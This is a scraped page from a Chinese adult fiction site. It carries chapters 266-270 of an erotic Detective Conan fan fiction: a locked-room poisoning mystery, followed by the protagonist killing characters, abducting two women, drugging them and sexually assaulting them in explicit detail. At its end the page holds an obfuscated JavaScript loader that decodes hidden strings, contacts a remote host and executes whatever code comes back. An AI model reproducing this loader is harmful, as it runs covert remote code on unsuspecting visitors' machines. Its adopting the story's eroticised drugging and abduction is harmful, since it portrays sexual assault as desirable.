返回

柯南泡妞录266-275作者我爱慕容淑443

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

字数:23000
前文链接:


第266章外交官杀人事件(1)

「我的名字叫服部平次!我今天来是找工藤新一挑战的!」这一天,侦探所来了一位黑皮肤的关西少年,自称是服部平次,要找新一挑战。

柯南一惊,他虽然对柯南的剧情记不太清楚了,但是服部平次这个名字还是记得的

这个时候,毛利说道:「我以前好像也听说过,关西有个非常有名的侦探。」
「是的,我是听说关东有个工藤新一的名侦探,还是大财团的老板,这才来找他的。」服部微笑道,「我想要知道工藤新一是不是一个值得和我相提并论的男人。」

接着,服部从自己的旅行包里取出一瓶酒,说道:「这是一种叫做"白干儿"的中国酒,在见到工藤之前我都要在这里打扰你们了,这个是见面礼,请收下吧!」

「哪有你这样自做主张的!」小兰嘟囔道。

「你们到底要我在外面敲门敲多久?你们这家侦探社还真会接待客人啊!」这个时候,门外忽然传来一个女声,「我很忙,能不能请你们马上听我说?」
众人一看,这是一个五十岁左右的老女人,她的名字叫辻村公江。

当下,毛利赶忙请她坐下。

「您要调查您公子女友的品行?」毛利问道。

「这些就是她的照片和简历!」公江将资料地给毛利。

照片上是个十分漂亮的女孩子,毛利看了看,说道:「桂木幸子小姐,今年24岁,在三叶中学和三叶高中都以第一名的优异成绩顺利毕业,目前在东都医大念书,立志成为悬壶济世的女医生……你对她有什么不满意的」

「没有,只是……」说到这里,公江有些犹豫。

「只是因为她太完美了,所以看不顺眼。人类本来就是一种多疑又善妒嫉的动物,看到太完美的人,就会不自觉地想要挑毛病,我说得没错吧?大婶!」一旁的服部微笑道。

「这个人是谁啊?」公江疑惑地问道。

「这个…他是我女儿的朋友……」毛利干笑道。

「总而言之……」公江站起身来说道,「详情等你到了我家之后再跟我先生详谈就是了!」

「请问……」毛利说道,「我现在就要过去吗?既然这样。你们夫妻一起来不就结了嘛?」

「我刚才也跟你说了,我的先生可是个外交官,要是被人知道他到这种地方来,就会被媒体炒作的!」公江说道。

「好吧!」毛利点头道。

「我也跟你们一块儿去吧!」这个时候服部说话了。

「什么?」众人吃了一惊。

「与其让大叔一个人过去,还不如让人家认为是我们父子去拜访,这样就不会受到怀疑了吧!」服部微笑道。

「也对,那就拜托你了!」公江说道。

而当下,除了服部和毛利,柯南小兰还有刚刚回来的灰原自然也是跟着去了。
来到外交官的家,管家很客气地对公江说道:「夫人,您回来啦?」

「老爷呢?」公江问道。

「我想老爷应该在书房里面吧!」管家说道,「这几位客人是……」

「他是我的一个老朋友,毛利先生!」公江说道。

「母亲大人……」忽然,旁边一个柔和的女声传来,众人转过头去一看,只见一个美丽窈窕的少女正微笑着看着公江,「我来打扰您了!」那女孩儿甜甜地说道。

「啊?是照片上的……」毛利脱口而出,服部立刻捂住他的嘴巴。

「你怎么会到这个地方来的?」公江疑惑地问道。

「是我叫她来的……」这个时候,后面又走出一个男子,他是外交官的儿子,辻村贵善,「我是看老爸想要和幸子见面,所以我才硬逼着她来的。看样子老爸从刚才开始就一直没离开书房。」

「对了,请问这几位客人是母亲大人您的朋友吗?」幸子微笑道。

「这跟你没关系……」公江冷冷地说道,「还有,我认为你还没有资格称呼我母亲大人!」

「对……对不起……」幸子赶忙道歉。

灰原低声对柯南道:「还真是冷酷的婆婆啊!」柯南无奈干笑。

公江也不理她,而是对毛利等人说道:「请跟我来吧!」说着,带着毛利等人上楼。

「什么嘛!一个续弦拽什么拽啊!」贵善嘟囔道。

上到楼上,公江遇到了外交官的父亲辻村利光,问道:「怎么?父亲大人,您没出去吗?」

「你在说什么啊?」利光笑道,「不是你跟我说要听我钓到那条大鱼的故事嘛?」说着,利光取出鱼的拓印,笑道,「怎么样?这条鱼是不是很大?」
「的确是蛮大的……」公江说道,「我马上就过去,请您先到和室那里等我!」
「好!」利光答应了一声。

来到书房门口,公江敲着门:「老公,毛利先生来了!老公……」可是没有人开门。

「奇怪了,难道不在里面吗?」公江嘟囔着,然后从包里取出了钥匙打开了门。

屋里播放着歌剧,外交官此时正坐在书桌后的椅子上,一只手撑着脸休息,他的旁边的书桌上堆着一大堆书。

「怎么了?你不是在书房嘛?真是的!音响还开着,竟然就这样睡着了!」公江走上前去说道。

「是歌剧啊!」服部嘟囔道。

公江走到外交官身边,推着他说道:「老公,醒一醒,快点起来了……老公?」忽然,公江脸色一变,因为外交官已经从椅子上倒了下来,摔倒了地上,就此不动。

第267章外交官杀人事件(2)

「老……老公!你怎么了?你醒醒,老公!」公江惊叫道。

「大婶,他已经死了……」服部探了探外交官的脉搏说道。

「兰!快去报警!」毛利大叫道,小兰赶忙去了。

灰原走到柯南身边,轻笑道:「你这死神,又发生案件了!」

「切!」柯南不屑地转过头去,然后走上前查看尸体。

柯南凑近尸体,心想:「死者身体还有余温,而且他的嘴唇也正开始变成紫色的……嗯?在他发根的地方有一个小小的红点,难道说……」柯南说着,开始在四下寻找起来。

「好痛!痛死了!」

服部大叫一声,原来二人的脑袋撞在一起了,柯南没事儿,服部很疼。
「这个小鬼怎么会在这个地方?」服部叫道。

柯南才不理会他,而是转身起身,走到一旁,他刚才已经发现了那枚凶器毒针,只是没去碰而已。

很快的,警察来了。

「死者名叫辻村勲,今年54岁,是个外交官,而且在尸体被发现的现场,正好就有一位侦探……」目暮警官无奈地说道。

「就是我!毛利小五郎!目暮警官!」毛利笑道。

「那么这是一件谋杀案咯,名侦探先生我。」目暮说道。

毛利嘿嘿一笑,说道:「看他没有明显的外伤,搞不好是……」

「你看仔细了,那具尸体!这一定是……」柯南叫道。

「毒杀!」服部接道,「这位大叔是被某人下了毒而杀死的,你看,除了在他的发根边缘留有一个红色的小点以外,尸体旁边还掉落了一根疑似凶器的针。这位大叔死的时候虽然手撑着脸颊,但是依我看,恐怕是被人用毒针刺死之后再故意摆出这个姿势的。」

「但是也存在自杀的可能性什么啊!」毛利说道。

「你到现在还不懂吗?」服部说道,「你看看这具尸体死者的嘴唇和手指末端都已经变成紫色的了,而且眼结膜上还有溢血点,这些都是窒息死亡的证据,但是这里根本找不出死者是被勒死或者是溺死而痛苦挣扎的迹象。因此,最有可能的就是凶手用毒麻痹死者的神经后令其窒息死亡,而且用的是一种立刻致死的剧毒。此外,从死者身上还有余温,以及完全看不出有死后僵硬以及尸斑的情况来看,他肯定是在我们进入书房前30分钟之内被某人给毒杀的,就被在这屋子附近的某人给杀害的!」

目暮警官看着服部喋喋不休地说着,忍不住问毛利说道:「毛利老弟,这个少年到底是谁啊?」

毛利说道:「他叫服部平次,是一个狂妄的少年侦探。」「服部平次?」目暮警官吃了一惊,「原来就是你啊!你就是大阪府警本部长服部平藏的儿子吗?」
「大阪府警本部长……」毛利吃了一惊。

「不错,大阪府警本部长确实是我老爸,可我依靠的是我自己,可不要把我和我老爸扯在一起啊!」服部说道。

目暮这个时候推理道:「书房里所有的窗户都是从房间里面反锁的,要从房间里出去根本不可能。这么说来因为这扇门是唯一的出入口,你们当中握有这个房间钥匙的某人是绝对脱不了关系的!夫人,这个书房应该有好几把钥匙吧?」
「没有……」公江说道,「只有两把钥匙,一把就是我手上的这把(从包里拿出钥匙),另一把在我先生身上。」

「你先生身上?」目暮吃了一惊。、

「是的,他平常都习惯把它放在裤袋里面!」公江说道。

「那么……」目暮说道,「我来确认一下!」说着,目暮蹲**,将手伸进了外交官的口袋里,「真的,裤袋里鼓鼓的……」

这个时候,钥匙被目暮一翻,从裤袋里的双层口袋掉了出来。

「怎…怎么可能?」柯南三人吃了一惊。

「怎么了?」毛利等人一头雾水。

「你还不懂吗?」服部说道,「我们进来的时候,这间书房的门明明是锁上的,也就是说凶手在犯案之后是把门锁上之后,才离开的这书房的。其中一把钥匙在和我们一起进书房的夫人,身上另外一把则是在被害人裤子的双层口袋里面,这就形成了完美的不可能犯罪,是密室杀人事件!」

「密室杀人?这怎么可能?」

「果然如此!」服部看着糊涂的侦探大叔毛利,心中冷笑到,「最近刊登在报刊上的,这个大叔的推理根本就不是他的东西,是工藤新一的所有的案件都是他解开的,这个昏庸的大叔偷偷和工藤联络,寻求他的协助而破案,这一次估计也不例外。很好,这件密室杀人事件到底谁会先解开,走着瞧吧!工藤新一!」
「你们在干什么啊?」服部说道,「案发时间应该是在3点半到4点之间,总之现在应该尽快查出这段时间可能犯案的人的不在场证明这才是最重要的吧!」
「对…对啊!」目暮笑道,然后低声对毛利说道,「喂!你可别输给他了,难道你要让这个外人毛头小子抢先吗?我和平常一样都把希望寄托在你身上了,名侦探!」毛利听了,不禁一阵为难。

第268章外交官杀人事件(3)

「那么,管家小池先生……」目暮警官首先问管家,「下午点到3、4点之间一直在大门口和附近的邻居聊天是吗?」

「是的!」管家说道。

目暮警官边记录边说道:「贵善先生和幸子小姐,他们两个也是在辻村夫人回家之前不久才到的,真是这样吗?」

「的确是这样没错!」管家点头道。

「那么在小池先生到玄关迎接辻村夫人回家的时候,你们在哪里?」目暮问贵善二人。

贵善说道:「我们到老爸的书房去了,可是书房的门锁住了,叫他又没有回答,所以我们很快就下楼来了。下来之后,马上就在玄关和母亲大人见面了。」
「那么……」目暮警官又问利光,「利光老先生,到这里来也是2点之后的事情?」

「正是如此……」利光点头道,「我好不容易到这儿来,阿勲却关在书房里面,公江她又出门去了,我实在没办法就一直呆在书房隔壁的客厅里看电视。」
「那么辻村夫人是什么时候出去的?」目暮警官又问道。

「我是个1点以前出去的。」公江说道。

服部和柯南同时想道:「这么说来,在犯案时间内最接近被害人的人就是除了小池先生和辻村夫人以外的那三个人了!」

目暮警官看着这里的众多CD,说道:「这里的CD数量还真不少啊!」
管家说道:「因为我们老爷向来很喜欢听古典音乐!」

柯南一听,不禁一愣,心道:「古典音乐?但是我们刚才发现尸体的时候,播放的明明是歌剧夫人啊!」

这个时候,目暮警官忽然看到了一张照片,不禁一愣,拿起来一看,说道:「这张照片是……」

「你问这个干什么?」公江说道,「这张是20年前的照片了!」

柯南仔细看了照片,只见上面是一男一女,男的是年轻的外交官,女的则是个美女,应该就是公江了,想不到现在的大妈,年轻时候居然这么美丽!

忽然,柯南看到那张照片,脸色登时一变……

「警官,桌子上的书该怎么处理呢?」高木这个时候问道。

「就放着吧!」目暮警官说道。

「书?」柯南吃了一惊,「对了!死者的面前的确是放着一整套的精装书,简直就像是一大叠一起从书架上被挪下来的!」

「警官!」一个警察上前说道,「被害人身上的这把钥匙环有点怪怪的什么,这个钥匙环打开以后,里面有胶带!」

「什么?」目暮打开钥匙环,服部看了,登时吃了一惊,「钥匙环正中间还有一条小小的空隙……」

柯南看了,不禁眉头一皱,心道难道凶手……

「你现在应该有一点眉目了吧?」目暮微笑着走到毛利身边,「怎么样?名侦探先生?」

「还没有啊!」毛利干笑道。

「等一下!难道说这个是……」服部忽然神色一变,转身跑了出去。

柯南心想:「尸体前面摆得不自然的这些书……而且凶案现场播放的歌剧……」

服部边跑边想:「那个粘在钥匙环上的胶带……还有正中间那个神秘的空隙……再加上这扇门下面的缝隙……」

「歌剧……」柯南想道。

柯南(服部):「原来如此!我知道了!我知道这间密室的手法了!」
柯南同时心想:「然后凶手就是那个人,不过,我可不希望他被逮捕!看来只好想办法让那个替罪羊认罪,或者干脆不揭穿凶手了!」

「服部怎么不见了?」目暮忽然问道。

「他刚才向我问了和室的位置后就出去了!」管家说道。

柯南听了这句话,不禁大喜,心道看起来那个家伙,已经上了凶手的当了。
此时,和室内。

服部正在到处翻找:「应该有的!如果我推理正确的话!肯定会在这房间的某处的!肯定有的……」

然后,服部从垃圾桶里找出一条钓鱼线,不禁大喜:「找到了!就是这个!这场比赛我赢定了!工藤!」

当服部再一次回到书房的时候,他说道:「我知道了,密室的手法以及凶手是谁了!」

毛利大惊:「你说什么?」

目暮大惊:「你已经解开了?这都要怪你太不中用了,毛利!」

「现在就让你们来看看证据!」服部微笑道,「目暮警官,不好意思,能不能请你当一下死者!」

「好!没问题!」目暮说道。

服部说道:「案发当时,这书房里的所有窗户都是从里面被锁住的,唯一可以出入的那扇门也用上锁了,这么一来就形成了不可能出入的密室杀人。但是,这个看似安全密闭的房间里,还留有一条缝隙!」

「缝隙?」众人吃了一惊。

「没错,就是那扇门下面的缝隙!」

毛利说道:「你该不会要说,那个凶手是通过这条缝隙把书房的钥匙丢进被害人的裤袋里的吧?」

「你说得没错……」服部微笑道,「只要有胶带,和我刚才找到的这条用来绑铁针的钓鱼线就行了!」

「钓鱼线?」毛利吃了一惊。

服部就开始利用目暮警官示范了:「凶手就是这个样子……先在被害人的脖子上刺进毒针将他杀害后……再把被害人的钥匙拿走……然后他再把绑了毒针的钓鱼线抽出来……用这根线绑住针的另一头……粘在胶带上面加以固定……然后将绑了针的一端塞进被害人的裤袋里……让钓鱼线从中间通过……最后让被害人坐在椅子上……让死者摆出被发现时手撑着脸颊的姿势……然后只要握着钓鱼线的两端从门口走出去就可以……从门下的缝隙把钓鱼线拉到门外……再把门关上……然后用钥匙把门锁上……接着把钥匙放在地上……再将钓鱼线的另一头拉过来就行了……这么一来钥匙就会通过门下的缝隙爬上桌子……自动地掉进被害人的裤袋里了……」说到这里,服部已经演戏完毕,钥匙果然进去了。

「进…进去了!」众人吃了一惊。

服部一边做一边推理:「然后他只要再用力一拉,就能够把钓鱼线从胶带里抽出来。最后只要把线收好,这样证据就消失了,如此一个完全的密室就形成了!」
「确……确实如此!」众人说道。

柯南看得心中冷笑,但是没有说话。

「那么凶手是……」毛利说道。

「凶手到底是谁,服部老弟?」目暮说道。」杀死被害人后,要完成这个手法至少要5至6分钟的时间,而犯案的时间是,3点半到4点这30分钟内,因此4点的时候和我们一起回到这里的辻村太太就没有嫌疑,同样的在点到4点这段时间内站在大门口和附近的邻居聊天并迎接我们和辻村夫人回到这里的管家先生也是清白,在我们和辻村夫人到达这里之前和管家出来迎接夫人的这段时间里,死者的儿子和他女朋友虽然也曾经到楼,但是顶多只有一、两分钟的时间,也是不可能犯罪的到底,这么一来,2点多的时候才到这里,并且一直在书房隔壁的客厅看电视的这位老先生,只有你才有可能!」

利光登时大惊。

「证据就是我之前在和室里发现的这根用来绑住铁针的钓鱼线,在采用新材料的钓鱼线中,这种钓鱼线是耐力最强、最细的一种。你喜欢钓鱼,应该不会说你不知道吧?而且在我们和辻村夫人要去书房的半路上,还在楼梯上遇到你,请你先到和室那边等我吧!也就是说你在行凶之后,就到了和室且,是在你确认了你自己的完美犯罪以后,我在和室的垃圾桶里发现的这根钓鱼线就是不可动摇的证据!怎么样,有说错吗?!老先生!」

「……没错!就是我!把我的儿子阿勲杀死的人就是我!」利光犹豫了一下,终于「认罪」了。

服部和一旁的柯南,一个得意、一个满意地笑了。

第269章公江幸子母。女双飞(1)

此时,柯南看着一脸得意的服部平次,冷冷一笑,运起时间法则,将时间停止。

登时,所有的人都动不了了,柯南再将服部平次杀死,仿效上次那样彻底毁尸灭迹,然后造了个傀儡的服部平次出来,然后才让时间恢复。

自此,服部平次也成为了柯南的俘虏!

※※※

夜晚,一间酒店的客房内。

此时,床上正躺着两个国色天香的美女,她们闭着眼睛,正是公江和幸子,是被柯南打晕虏劫来的。

此时的公江,已经不再是五十多岁的大妈,而是已经恢复了青春,如今的她美丽可爱,和幸子就像是一对双胞胎姐妹一样,这都要多亏此时变回新一的柯南,他利用时间法则恢复了公江的青春。

至于贵善,则已经被新一杀了。

而此时,公江和幸子这对母女花已经被脱光了,二女都是长相一样,母女花真是太美。二女都已经服食了迷情剂,都已经完全沉迷。

此时,新一首先扑倒幸子,幸子虽然有男朋友,但还是处女,她的两个乳房像两个馒头一样扣在她的胸前,随着她激动的身体一颤一颤的。新一的唇慢慢地从她的额头,吻向她的双颊,然后慢慢地来到下巴,最后停留在她的胸上。
沿着她左边的乳房,由外向内,慢慢地舔弄,直到她的乳晕。新一的舌灵活地绕着幸子的乳头转动,最后将她的乳头含进嘴里,幸子忍不住发出了轻微的呻吟。

新一缓缓除去身上的衣服,他拿着幸子的手放到自己怒涨的阳具上,让她握住。幸子只能依从,握着新一粗大的肉棒幸子虽然服过迷情剂,但依然感到一阵恐惧:「新一,它太大了,我下面恐怕放不下呀。」

新一的手在幸子的小穴上抚摸,安慰她说:「没关系的,我不会弄疼你的。」
说着手指伸到她的穴里扣弄起来。幸子不住的呻吟着:「嗯……嗯……新一……人家……好舒服……」

新一见幸子已不能自己,就分开她的双腿,把自己的鸡巴对准她的小穴轻轻往里捅,粗大的龟头刚碰到处女膜,幸子就「呀」的一声叫疼。新一赶紧停下来用龟头在她的小穴口上慢慢的磨。不一会儿幸子就又忍不住了,她哀求着,喊着说穴里痒的难受。这时候新一不在客气,他下身往前一挺,大鸡巴直插进幸子的穴里。幸子疼的「哎呀,哎呀」地叫着。新一开始抽动他的阳具而且愈来愈快,也愈来愈有力。幸子的叫声也愈来愈大:「唔……唔……好爽……天啊……好疼……好舒服……新一……不要停……操死幸子啦……新一……大鸡巴……好厉害……啊……」新一见她淫语浪词不断,更加情欲高涨操的幸子如醉如痴。

此时,新一扶着幸子坐起,使她双腿分跨自己两侧腰际,搂紧她纤柔欲折的柳腰,往自己的方向不断震动,好使阳具一次又一次地深入她的私处。幸子满脸尽是羞意,狂涌的蜜汁流了满腿,阳具后抽时,月光下的嫩唇晶光闪闪,绮丽异常;勐一插入时,爱液又成了四散的珍珠,随着她的呻吟抛了开来。

「啊……好舒服……怎么……这么……啊……舒服……」新一亦是更加兴奋,双手箍住幸子的细腰,提起浑圆的翘臀,前后大抽大送起来,但见那乌黑的巨棒在雪白的玉穴间忽隐忽现,每一插送都顶得幸子的两瓣娇臀随势前后震颤,伴着「滋,滋」的响动和两人粗重的喘息,一时间真个满目春色。

新一直干了有千余抽,幸子的蜜穴内已是暖热爽快,在阵阵冲撞下周身通畅,可是毕竟新一武功高强,持久力强,竟是迟迟也没有发射的迹象,而此时眼见幸子那娇弱的身子,心下一动,不由浮出了一个想法。

幸子尚在神魂颠倒之间,却感觉蜜穴内的那根阳物竟是停止了抽动,反而是往外抽出,原本紧闭的双眸不由张开往新一看了一眼,却见他嘴角浮出一抹邪笑,竟是将她的身子翻了个个,倒趴在床上。

幸子被他这一番摆弄,心下却是大羞,身子难以抗拒那酥麻的快感,尤其是蜜穴间一阵阵空虚,只想被新一那根巨物填满,再没有其他的念想了。

新一瞧见幸子的羞涩模样,心下甚是畅快,便跪坐在她身后,胯间的伟物却是更加坚挺硕大,如一杆墨色长炮昂然指天。顶得幸子的臀缝间一阵阵的酥麻,新一眼见那一只浑圆有型的翘臀和那玲珑有致的纤细腰肢,心里的欲火愈发旺盛。
便将赤红的龟头对准娇艳的花芯,略一加力,整个龟头又一次插入了幸子的嫩穴之中。

幸子浑身一抖,却已无力抗拒,仅低低喘了一声,咬住牙关将臀儿用力噘起,深吸了口气。双目却是紧紧的闭上,流下了一抹幸福的泪花。

新一借机又加上几分力,将巨物的多半根均插在了幸子的花径内,龟头直抵到了花径尽头,这次尽根没入竟是如斯粗暴,直痛得幸子的俏脸都有了几分扭曲,黄豆大的冷汗溷杂着泪水不断的滴落。

皆因这个姿势的缘故,新一的每一次深入竟是完全触及了幸子花径深处那娇嫩的花蕊,花房的开口都几乎被粗大的龟头完全撑开。前所未有的充足让幸子也不由发出了娇吟:「啊……嗯……啊……唔……」不过此时的呓语完全没有任何的意义了,除了叫出她体内的快乐以外便只能勾起新一的兴奋。新一将巨根停在幸子花房深处片刻,帮幸子拭去额前的汗滴,轻轻抚摩着幸子的全身,待其放松之后才缓缓起身将玉炮抽出几寸,只见白嫩的炮身上竟沾着几丝血迹,新一索性又缓缓插回。

适才破身之时的血渍并没有涌出,却是倒流进了幸子花径的深处,这一次插入才沾染了红,更是让新一感到无比兴奋,抽送的动作也愈发激烈起来。

随着一根乌黑的巨根在幸子娇嫩的花径内的抽插,幸子的手也不由向后揽起了新一的身子,在他的身上抓出了数十道血痕,两人均沉醉在这痛与美之极至中,呻吟声此起彼伏。

在勐烈的抽动中,幸子的花径内壁奋力收缩,温柔而有力,诱得新一几乎要射出精来。他几次拼命忍住,继续动作,摩擦得肌肤火热,要把幸子推上更高的颠峰。不过越是忍耐,幸子的身体越是渴望,阳具越是难以自制。啪啪啪声响不绝,身体碰撞越趋激烈,澎湃的快感如漩涡般卷袭了两人。

「唔……唔唔……」幸子没想到新一这次做得这样久,身体竭力颤动,口中婉转呻吟,浑身酥软的趴在面前的床上,根本顾不得什么羞耻,只觉得舒服得快要晕了过去,连头都快抬不起来了。

新一也在她体内得到热烈的回响,挪出少许精力,轻声喘道:「幸子……我……我要去了……」幸子此时身子紧紧贴在榻上,却仍是喘息着叫道:「不……啊啊……哈……哈啊……我……也不行了……哈啊!」

片刻之后,新一只觉会阴处连连发紧,整根大棒又涨又麻,一股不可自控的快意潮水般狂袭而至,随着一声幸福的低吼,新一的防线彻底崩溃,汩汩琼浆倾巢而出,勐力大射了十馀下,将幸子的的花房内注得满满,乳白色的阳精混合着血渍顺着花穴和阳根满溢而出。

而幸子的花径内亦是忽地一紧,一阵抽搐后,耐不住花房深处传来的强烈刺激,又一次泄出了自己的阴精,滚烫的阴精打在新一敏感的龟头上,止不住又连着射出了几股乳白色的精液。

第270章公江幸子母。女双飞(2)

然后,新一推开幸子,又扑到公江身上,用左手扶着粗大的阳具,狠狠的插进了公江的阴道内。

「啊……新一!好疼啊……」公江由于外交官性功能不行,长期没有性交,所以下体此时被如此大的鸡巴塞入,登时感觉到下体一股剧烈的疼痛传过来,不禁忍不住叫出声来。

新一感受到自己进入了公江的身体,心中不禁高兴的发狂,此时公江紧密的阴道包裹着新一的大鸡巴,令他几乎都要泄出来,他于是默运玄功,意守精关,不让自己轻易泄出来出来,接着不顾公江的感受,立刻就大力抽插起来!

粗壮火热的鸡巴一次又一次的,粗暴地抽戳她娇嫩的肉屄,龟头下下顶撞到小屄的深处,阴囊随着阳具的大力抽插,不停地撞击着她白嫩的屁股,发出「啪、啪、啪」的声音,真让新一十分兴奋!

新一的大鸡巴与她阴壁里的嫩肉每磨擦一次,公江的娇躯就会颤抖一下,而她的小屄里也会紧夹一次。公江的子宫口的软肉团像一张小嘴似地,吸吮着新一深深插入的大龟头,紧暖的阴道肉壁,天衣无缝的裹夹新一的大阳具,那种又暖又紧的感觉,给人一番无限销魂的滋味。

公江此时已经不疼了,而是快乐,她娇喘着,任由新一肆意奸淫她的美屄!
新一心花怒放,开始改变了姿式。

新一先缓缓地把大鸡巴往外抽拔,直到只剩一个龟头在她的小屄入口处,再用力地急速全根插入,每次都让龟头深入到她花心深处。

每当大鸡巴一进一出,她那小屄洞口的鲜红柔润的屄肉,也随着鸡巴的抽插而有韵律地翻出翻进。

公江忘情地,娇躯不停地颤抖、小腿乱伸、肥臀猛筛,她的双脚像八爪章鱼似的,紧缠住新一的腰身,双手也拼命地按着新一的臀部,自己也用劲的上挺,让小屄紧紧凑迎着大鸡巴,一丝空隙也不留…

新一边用力抽出插入,边旋转着臀部,使得大龟头在小屄里自多个角度,研磨公江屄花心的嫩肉。

小屄开始不自主的一张一合,大鸡巴太爽了,淫兴勃勃,愈抽愈急、愈插愈猛,干得公江娇喘连连、媚眼如丝。新一可感到公江的阴道在抽搐、在痉挛,淫水潺潺流出,肥臀已是湿漉漉,床单上也已湿了一大片,混合上那片片落红,说不出的淫荡。

新一把她抱得紧紧,胸膛压着她那双高挺如笋的乳房,但觉软中带硬、弹性十足,大鸡巴插在又暖又紧的小屄里,真舒畅极了。

新一欲焰高炽,大起大落的狠插猛抽、次次插得她花心乱颤。她的小屄紧密地吸吮着龟头,让新一感到无上的快爽!

公江已完全忘了羞耻,抛弃矜持,大声的淫浪哼叫着……

新一用足了力气,猛攻狠打,大龟头次次撞击着屄花心,下下触底、次次入肉。公江的双手双脚缠得新一更紧,肥臀拼命挺耸,配合新一的抽插。

新一估计自己已抽插了两千多次。

公江舒服得媚眼如丝、欲仙欲死、魂飘魄渺、香汗淋淋、娇喘呼呼,阵阵淫水猛泄。

「唉唷……美死公江啦……太棒……太棒了……新一……你下面那是什么东西……啊……你好厉害……好会……弄公江的……尿尿的地方……好爽……哦……我快不行了……啊……」

公江此时的阴户被新一猛抽狠插,再加上双手揉捏乳头的快感,这样滋味还是第一次享受到,尤其新一的大宝贝,次次都碰得她的花心是酥麻、酸痒,阴壁上的嫩肉被粗壮的宝贝胀得满满的,在一抽一插时,被大龟头上凸出的大淩沟,刮得更是酸痒不已,真是五味杂陈妙不可言。兴奋和刺激感,使得公江的肥臀左右摇摆、前后挺耸,配合新一的猛烈的插抽。

「哎唷喂……新一……公江的命……今天一定会死在你的……手里啦……抽吧……插吧……用力的……深深的插吧……插死你的公江吧……啊……公江好舒服……好痛快……公江的水又……又……出来了……喔……泄死我了……」现在的公江,已经完全陷入到情欲之中了。

新一只觉得公江的子宫口正在一夹一夹的咬吮着自己的大龟头,一股像泡沫似的热液直沖龟头而出,流得席子上面一大片。自己也将达到射精的巅峰,为了使她更痛快,于是拚命沖剌。龟头在肥穴里一左一右的抽插,研磨着她的花心,口里大叫道:「公江……你的屁股挺快点……我快……快要射精了……快……」
公江的腰臀都扭动的酸麻无力了,听到他的大叫声,急忙鼓起余力拼命的左右前后挺动,把个肥臀摇摆得像跳草裙舞似的那样快。新一只感到公江的花心开合的更快,咬吮得龟头更紧更密。

「哎呀……害死人的新一……公江……又……又泄了……」

「啊……公江……我……我也射精了……」新一只觉得宝贝周围的数层嫩肉一阵强烈的痉挛抽,好似要把他整个挤乾似的,又被公江的热液再次的一沖激,顿时感到一阵舒畅,一阵从未有过的快感直沖脑门,龟头一痒一麻,背脊一酸,一股浓热滚熨的阳精飞射而出,喷进了公江的小穴深处。

新一无力地压在公江的身上,他的宝贝间歇性地膨胀,每一次都有灼热的液体,在公江的子宫里飞散。一阵阵的精液冲击,也一次又一次的把公江带上高潮的颠峰,灵魂像是被撕成了无数块,融入了火热的太阳,再无彼此之分:「哎呀……烫死我了……新一……」

二人都达到了性的满足的顶点,公江经过了绝顶高潮后,整个人完全瘫软下来,肌肤泛起玫瑰般的艳红,温香软玉般的胴体紧密的和新一结合着,脸上红晕未退,一双紧闭的美目不停颤动。新一低头看着怀中的公江,心中感到无限欣慰,也不急着拔出宝贝,轻轻柔柔的吻着怀中的公江,双手更是在柔软的白玉肉体上翻山越岭,尽情揉捏爱抚母女花的肉体。

自此,公江母女花就是新一的女人了。

评分
相关推荐
3.0分

3.0分 [柯南泡妞录][未删节1-275章][更新中]850

3.0分

3.0分 名侦探柯南H版作者:不详5d4

3.0分

3.0分 柯南同人6cf

3.0分

3.0分 【柯林的野望】【作者:sxkbt03】【完】56c

3.0分

3.0分 【我叫淑华】【作者:hhscs8888】【完】76e

3.0分

3.0分 岳母慕琴作者不详2fd

3.0分

3.0分 仙剑奇侠传五改编版(6-7)作者:慕容英c4f

3.0分

3.0分 仙剑奇侠传4后续改编版(1~6)作者:慕容英70b

3.0分

3.0分 容姨,爱意,爱姨作者KKK8a8

3.0分

3.0分 柯南同人灰原篇168

3.0分

3.0分 重生之风流柯南329

3.0分

3.0分 我的回忆录1-4作者xuanzhiyun918

3.0分

3.0分 慕容複淫传511

3.0分

3.0分 【我与越南岳母】【作者:legend_zgmfx666】【完】3ab

3.0分

3.0分 巨乳慕容老师cd2

3.0分

3.0分 沉沦重楼胯下的紫萱(仙剑三电视剧改编) 作者:慕容英265


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var 